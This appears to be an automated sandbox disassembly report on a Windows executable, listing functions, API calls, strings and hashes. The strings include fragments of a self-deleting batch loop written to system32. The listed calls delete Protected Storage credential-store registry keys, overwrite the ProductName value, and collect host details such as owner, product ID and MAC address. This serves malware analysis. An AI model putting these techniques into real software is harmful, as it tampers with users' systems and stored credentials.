Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: FileResource$H_prolog$CopyDeleteExecuteFindLoadLockModuleNameShell
String ID: del $ exit$"$" goto loop$:loop$@echo off$There are %d times remain to try!$There are no times remain to try, you must sign to use it!$\system32\winbws.bat$\system32\winsys.ini$\system32\winsys.ini $\system32\winsys.ini "$copy $del "$if exist "$open$start " " "
API String ID: 2304847132-3863200934
Opcode ID: 423f7c3977916f47568863e1800cbfd69c56de55b5a196779e49ba8ee4df1684
Instruction ID: fcd660b851029791eff8e37d441e36e2141ad544d5897bee44c52de96331267e
Opcode Fuzzy Hash: 423f7c3977916f47568863e1800cbfd69c56de55b5a196779e49ba8ee4df1684
Instruction Fuzzy Hash: 1CC17D750083819BC314EB66C856FDFBBE8AF95308F40491FF589521D2EBB89508CB6B

Function 00404F00 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 208registryCOMMON

Download Yara Rule

APIs

_rand.LIBCMT ref: 00405041
RegOpenKeyExA.KERNEL32 ref: 0040507B
_strncpy.LIBCMT ref: 00405118
RegSetValueExA.KERNEL32(?,ProductName,00000000,00000007,?,?), ref: 0040514A
RegCloseKey.KERNEL32(?), ref: 00405155
GetParent.USER32(?), ref: 0040515F

Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6

Strings

Windows Me, xrefs: 00404F87
Windows NT 3.5, xrefs: 00404F9A
Windows 3.1, xrefs: 00404F4E
Windows 95, xrefs: 00404F61
Windows XP Professional, xrefs: 00404FE6
Windows 2000 Professional, xrefs: 00404FC0
Windows 98, xrefs: 00404F74
Windows Vista, xrefs: 0040501F
Windows Server 2008, xrefs: 00405032
ProductName, xrefs: 00405144
Windows Server 2003, xrefs: 0040500C
Windows XP Home Edition, xrefs: 00404FF9
Windows NT 4.0, xrefs: 00404FAD
Windows Sever 2000, xrefs: 00404FD3
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040504E

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CloseMessageOpenParentValue_rand_strncpy
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 2000 Professional$Windows 3.1$Windows 95$Windows 98$Windows Me$Windows NT 3.5$Windows NT 4.0$Windows Server 2003$Windows Server 2008$Windows Sever 2000$Windows Vista$Windows XP Home Edition$Windows XP Professional
API String ID: 259016058-1574738584
Opcode ID: d4a387fc0c1b000aa3560587b30e8cf3f5790bc05cc8cfac1ab569a616065950
Instruction ID: 6947d528358f3abf9f61610de5f967e2356a8112bdea7af398e2d87693c0fe26
Opcode Fuzzy Hash: d4a387fc0c1b000aa3560587b30e8cf3f5790bc05cc8cfac1ab569a616065950
Instruction Fuzzy Hash: 858192712087019BC314DF28D996F5BB3A4EFC4719F104A1EF4966B2D2DA78A80DCB67

Function 0043AEB0 Relevance: 33.6, APIs: 8, Strings: 11, Instructions: 378windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(?,00000000), ref: 0043AEE8
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 0043AF51
AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 0043AF5C
SendMessageA.USER32(?,00000080,00000001,?), ref: 0043AF9C
SendMessageA.USER32(?,00000080,00000000,?), ref: 0043AFAD
GetVersionExA.KERNEL32 ref: 0043B067
SendMessageA.USER32(?,00001309,00000000,00000000), ref: 0043B147
GetClientRect.USER32(?,?), ref: 0043B1E6

Part of subcall function 004021B0: FindResourceA.KERNEL32(00000000,?,00000006), ref: 004021CA

Part of subcall function 00459A51: SetWindowPos.USER32(?,000000FF,?,?,?,?,8rE,?,00457238,00000000,?,?,000000FF,000000FF,00000015), ref: 00459A77

Strings

Unknown OS!!, xrefs: 0043B082
System1, xrefs: 0043B19E
OS:WIN98, xrefs: 0043B11C
System2, xrefs: 0043B1B1
MAC Addr, xrefs: 0043B178
Disk, xrefs: 0043B18B
Name, xrefs: 0043B166
OS:WINNT, xrefs: 0043B0D4
OS:WIN95, xrefs: 0043B0F8
OS:WIN2000, xrefs: 0043B0AF
(TRIAL), xrefs: 0043AFE3

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: MenuMessageSend$Append$ClientFindRectResourceSystemVersionWindow
String ID: (TRIAL)$Disk$MAC Addr$Name$OS:WIN2000$OS:WIN95$OS:WIN98$OS:WINNT$System1$System2$Unknown OS!!
API String ID: 2761810206-2538934281
Opcode ID: 456dd4ae6cbf86949a8a9846d028dfff195fd231771f08457c1837c9d0f39645
Instruction ID: 28d43a913e9cc64de2e3d69b6c2acafb16c2cec924d16276a36815c0c13835ca
Opcode Fuzzy Hash: 456dd4ae6cbf86949a8a9846d028dfff195fd231771f08457c1837c9d0f39645
Instruction Fuzzy Hash: 55E1AB70344701ABD714CB24CC99F6BB7A5BB88704F148A1DF6999B3C2DB74E806CB99

Function 004588B4 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A

CallNextHookEx.USER32(?,00000003,?,?), ref: 004588E9
GetClassLongA.USER32(?,000000E6), ref: 0045892E
GlobalGetAtomNameA.KERNEL32(?,?,00000005,?,?,Function_0005EC43), ref: 0045895A
lstrcmpiA.KERNEL32(?,ime), ref: 00458969
SetWindowLongA.USER32(?,000000FC,Function_00057E4D), ref: 004589A3
CallNextHookEx.USER32(?,00000003,?,?), ref: 00458AA7
UnhookWindowsHookEx.USER32(?), ref: 00458AB8

Strings

#32768, xrefs: 004589E4, 004589E9, 00458A35
AfxOldWndProc423, xrefs: 00458A5E, 00458A63, 00458A70, 00458A7A, 00458A85
ime, xrefs: 00458963

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
String ID: #32768$AfxOldWndProc423$ime
API String ID: 3204395069-4034971020
Opcode ID: b744e14381c748edc6cb2f3dde0798086747d9b54c23ed16838e655696a45219
Instruction ID: c31b28fc186431055d90b645be9d6e60fd1338abb9f4e3e990662555ef10b02e
Opcode Fuzzy Hash: b744e14381c748edc6cb2f3dde0798086747d9b54c23ed16838e655696a45219
Instruction Fuzzy Hash: 7851A131504215ABDF11AF50DC48B9E3B75AF04362F14816BFD18E62A2DF789E44CB99

Function 00436B70 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 203registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00436BD0
RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 00436C9B
RegQueryValueExA.KERNEL32(?,CSDVersion,00000000,00000000,?,80000002), ref: 00436CBB
RegQueryValueExA.KERNEL32(?,BuildLab,00000000,00000000,?,?), ref: 00436CDB
RegQueryValueExA.KERNEL32(?,RegisteredOwner,00000000,00000000,?,?), ref: 00436CFB
RegQueryValueExA.KERNEL32(?,RegisteredOrganization,00000000,00000000,?,00000000), ref: 00436D1B
RegQueryValueExA.KERNEL32(?,ProductId,00000000,00000000,?,?), ref: 00436D3B
RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00436DE6

Strings

ProductName, xrefs: 00436C95
CSDVersion, xrefs: 00436CB5
RegisteredOrganization, xrefs: 00436D15
BuildLab, xrefs: 00436CD5
ProductId, xrefs: 00436D35
RegisteredOwner, xrefs: 00436CF5
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00436B9A

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: BuildLab$CSDVersion$ProductId$ProductName$RegisteredOrganization$RegisteredOwner$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1586453840-3514816458
Opcode ID: a23dedceb0709ab06c998942d328721647c64ebb905cba96a9fea81f01879b03
Instruction ID: e5fba20e6ff125bba2283bc3006cd0e19e9b6b9096beb30a0a4ca32c458e7ecf
Opcode Fuzzy Hash: a23dedceb0709ab06c998942d328721647c64ebb905cba96a9fea81f01879b03
Instruction Fuzzy Hash: 55718D71108741AFD724DF14CC55F9BB3E8EBC8714F008A2EB199971D1EBB4A509CB96

Function 0045708A Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 171windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838

GetParent.USER32(?), ref: 004570B5
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004570D8
GetWindowRect.USER32(?,?), ref: 004570F1
GetWindowLongA.USER32(00000000,000000F0), ref: 00457104
CopyRect.USER32(?,?), ref: 00457151
CopyRect.USER32(?,?), ref: 0045715B
GetWindowRect.USER32(00000000,?), ref: 00457164

Part of subcall function 0043D078: MonitorFromWindow.USER32(00000002,00000000), ref: 0043D08D

Part of subcall function 0043D0E3: GetMonitorInfoA.USER32(00000002,00000000), ref: 0043D0F8

CopyRect.USER32(?,?), ref: 00457180

Strings

(, xrefs: 0045711C
@, xrefs: 004570F3

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
String ID: ($@
API String ID: 1450647913-1311469180
Opcode ID: 11ece05fcfe3392379b065859adf182a91a3234133933bd66773f20962e9c44d
Instruction ID: f9aac2a8b0235c18acd1f2551889d6b630a400b2f47a5db2de4d24cadace4ab8
Opcode Fuzzy Hash: 11ece05fcfe3392379b065859adf182a91a3234133933bd66773f20962e9c44d
Instruction Fuzzy Hash: 19519471904608AFCB10DBB8DC85EEEBBB9AF44311F144166F901F7281EA34EC098B68

Function 00401400 Relevance: 22.6, APIs: 15, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?), ref: 0040140A
OpenProcessToken.ADVAPI32(00000000), ref: 00401411
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000), ref: 0040142A
GetLastError.KERNEL32 ref: 00401430
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401455
HeapAlloc.KERNEL32(00000000), ref: 0040145E
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00401474
GetLengthSid.ADVAPI32 ref: 00401481
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040148C
HeapAlloc.KERNEL32(00000000), ref: 0040148F
CopySid.ADVAPI32(00000000,00000000), ref: 004014A1
GetProcessHeap.KERNEL32(00000000), ref: 004014B0
HeapFree.KERNEL32(00000000), ref: 004014B3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014C8
HeapFree.KERNEL32(00000000), ref: 004014CB

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Heap$Process$Token$AllocFreeInformation$CopyCurrentErrorLastLengthOpen
String ID:
API String ID: 4067104921-0
Opcode ID: 6b90823c6b706cc8d65496f5219d6948ff2a4456f403bc18005a6de8c253be82
Instruction ID: be5dff9eabe861d766ec5fd4dd401e50df9c5d4daca625da32615f9425814a56
Opcode Fuzzy Hash: 6b90823c6b706cc8d65496f5219d6948ff2a4456f403bc18005a6de8c253be82
Instruction Fuzzy Hash: 92216771200305ABD720AB71EC89F6B77ACEB84B55F004439F944C6290EAB4DC45C7BA

Function 0042B660 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 327comCOMMON

Download Yara Rule

APIs

Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF

CoCreateInstance.OLE32 ref: 0042B6F9
VariantInit.OLEAUT32(?), ref: 0042B835

Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6

Strings

Query failed, xrefs: 0042B9DD
Instantiation of IWbemLocator failed, xrefs: 0042B705
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 0042B683
SELECT * FROM Win32_ComputerSystem WHERE Name=", xrefs: 0042B751
Domain, xrefs: 0042B81F
root\cimv2, xrefs: 0042B72F
NV Hostname, xrefs: 0042B6A7
Couldn't connect to service, xrefs: 0042BA31
WQL, xrefs: 0042B7C0

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CreateErrorInitInstanceLastMessageOpenVariant
String ID: Couldn't connect to service$Domain$Instantiation of IWbemLocator failed$NV Hostname$Query failed$SELECT * FROM Win32_ComputerSystem WHERE Name="$System\CurrentControlSet\Services\Tcpip\Parameters$WQL$root\cimv2
API String ID: 3264900959-945420370
Opcode ID: 91d881ce3ac4bc71bd9289584d48d08c439b38d8dd9c1fcc01c3be25e2c58784
Instruction ID: e19c71c077be67fb10b829806df480d9e94b8e638e4d3a62bd1a267aacc894f3
Opcode Fuzzy Hash: 91d881ce3ac4bc71bd9289584d48d08c439b38d8dd9c1fcc01c3be25e2c58784
Instruction Fuzzy Hash: AFC191B02083809FD310DB69C885F6FB7E9AFC4318F544A1EF19987292D7789849CB5B

Function 00404C50 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 210memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401370: GetVersionExA.KERNEL32 ref: 004013AC
Part of subcall function 00401370: GetVersionExA.KERNEL32(?), ref: 004013BF

SHDeleteKeyA.SHLWAPI(80000001,?,?,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404DCC
GetProcessHeap.KERNEL32(00000000,?,?,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404DDD
HeapFree.KERNEL32(00000000), ref: 00404DE4

Part of subcall function 004012E0: GetVersionExA.KERNEL32 ref: 0040131C
Part of subcall function 004012E0: GetVersionExA.KERNEL32(?), ref: 0040132F

GetProcessHeap.KERNEL32(00000000,?), ref: 00404E12
HeapFree.KERNEL32(00000000), ref: 00404E19

Part of subcall function 00401860: RegOpenKeyExA.ADVAPI32(?,?,00000000,00040000,?), ref: 00401894
Part of subcall function 00401860: RegSetKeySecurity.ADVAPI32(?,00000004,?), ref: 004018AA
Part of subcall function 00401860: RegCloseKey.ADVAPI32(?), ref: 004018C9
Part of subcall function 00401860: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004018E0
Part of subcall function 00401860: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0040190E
Part of subcall function 00401860: RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000105), ref: 0040194C

GetUserNameA.ADVAPI32(?,?), ref: 00404E58
SHDeleteKeyA.SHLWAPI(80000002,?,\Data\e161255a-37c3-11d2-bcaa-00c04fd929db,0000002A,?,?,Software\Microsoft\Protected Storage System Provider\,00000035), ref: 00404EAD

Strings

\e161255a-37c3-11d2-bcaa-00c04fd929db, xrefs: 00404DA0
Software\Microsoft\Protected Storage System Provider\, xrefs: 00404CFD, 00404E60
\Data, xrefs: 00404D7B
\Data\e161255a-37c3-11d2-bcaa-00c04fd929db, xrefs: 00404E95

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: HeapVersion$DeleteFreeOpenProcess$CloseEnumInfoNameQuerySecurityUser
String ID: Software\Microsoft\Protected Storage System Provider\$\Data$\Data\e161255a-37c3-11d2-bcaa-00c04fd929db$\e161255a-37c3-11d2-bcaa-00c04fd929db
API String ID: 76489323-2944829630
Opcode ID: c252d06217ff17f3d4f9251d05438e285e58edb30c13b934adffffeaa3b05065
Instruction ID: 77fd4bca92202b6cf2dab01a516e43f9aa8c3c24651323e1d72e56862fef26ee
Opcode Fuzzy Hash: c252d06217ff17f3d4f9251d05438e285e58edb30c13b934adffffeaa3b05065
Instruction Fuzzy Hash: CE7180712043019FD314EF61C859FABB7A8FBC4744F04492DF545972E1EBB8A909CB9A

Function 00455F5B Relevance: 16.6, APIs: 11, Instructions: 120COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00455F60
FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455F98
LoadResource.KERNEL32(?,00000000), ref: 00455FA0

Part of subcall function 00457843: UnhookWindowsHookEx.USER32(?), ref: 00457868

LockResource.KERNEL32(00000000), ref: 00455FB2
GetDesktopWindow.USER32 ref: 00455FDF
IsWindowEnabled.USER32(00000000), ref: 00455FED
EnableWindow.USER32(00000000,00000000), ref: 00455FFC
EnableWindow.USER32(00000000,00000001), ref: 0045608B
GetActiveWindow.USER32 ref: 00456096
SetActiveWindow.USER32(00000000), ref: 004560A4
FreeResource.KERNEL32(00000000), ref: 004560C0

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 833315621-0
Opcode ID: 06b7fb4a99dd4ef476a30b6c5874a4420647a7562e42e7a2b9a386645e9465a3
Instruction ID: 2a4ce187d4919ba72b0d1d9773206bd8c7ff34da06ea6e71cf98739f74d54366
Opcode Fuzzy Hash: 06b7fb4a99dd4ef476a30b6c5874a4420647a7562e42e7a2b9a386645e9465a3
Instruction Fuzzy Hash: 09418331500705DBCF20AFA5D94976FBBB5AF0471AF50042FE902622E2DBB85949CB5A

Function 00435159 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 273windowregistryCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000143,00000000,?), ref: 0043518C
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0043520B
SendMessageA.USER32(?,0000014E,FFFFFFFF,00000000), ref: 0043545D

Strings

), xrefs: 004352E1
SYSTEM\CurrentControlSet\Control\Nls\Language, xrefs: 00435280
SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 004351E6
Default, xrefs: 0043529D
(, xrefs: 00435466
0000, xrefs: 004352F7

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: MessageSend$Open
String ID: ($)$0000$Default$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\$SYSTEM\CurrentControlSet\Control\Nls\Language
API String ID: 1554988408-487650185
Opcode ID: e2043e2506104ae5d6c811f734f8f202e9f768df778a98a85b5ff77156bb7f8c
Instruction ID: c4091e44bddb758ac13fe4f631b60d438c76e1330555841b1ac334d37b406dde
Opcode Fuzzy Hash: e2043e2506104ae5d6c811f734f8f202e9f768df778a98a85b5ff77156bb7f8c
Instruction Fuzzy Hash: 49B1BF70204B418FD714CF28C885B9AB3E1BF99324F148B5DF8A98B2D5DB74E805CB96

Function 0045875C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00458761
GetPropA.USER32(?,AfxOldWndProc423), ref: 00458779
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004587D7

Part of subcall function 00457CE7: GetWindowRect.USER32(?,?), ref: 00457D0C
Part of subcall function 00457CE7: GetWindow.USER32(?,00000004), ref: 00457D29

SetWindowLongA.USER32(?,000000FC,?), ref: 00458807
RemovePropA.USER32(?,AfxOldWndProc423), ref: 0045880F
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00458816
GlobalDeleteAtom.KERNEL32(00000000), ref: 0045881D

Part of subcall function 00456D25: GetWindowRect.USER32(?,753BFA40), ref: 00456D31

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00458871

Strings

AfxOldWndProc423, xrefs: 00458772, 00458777, 0045880D, 00458815

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

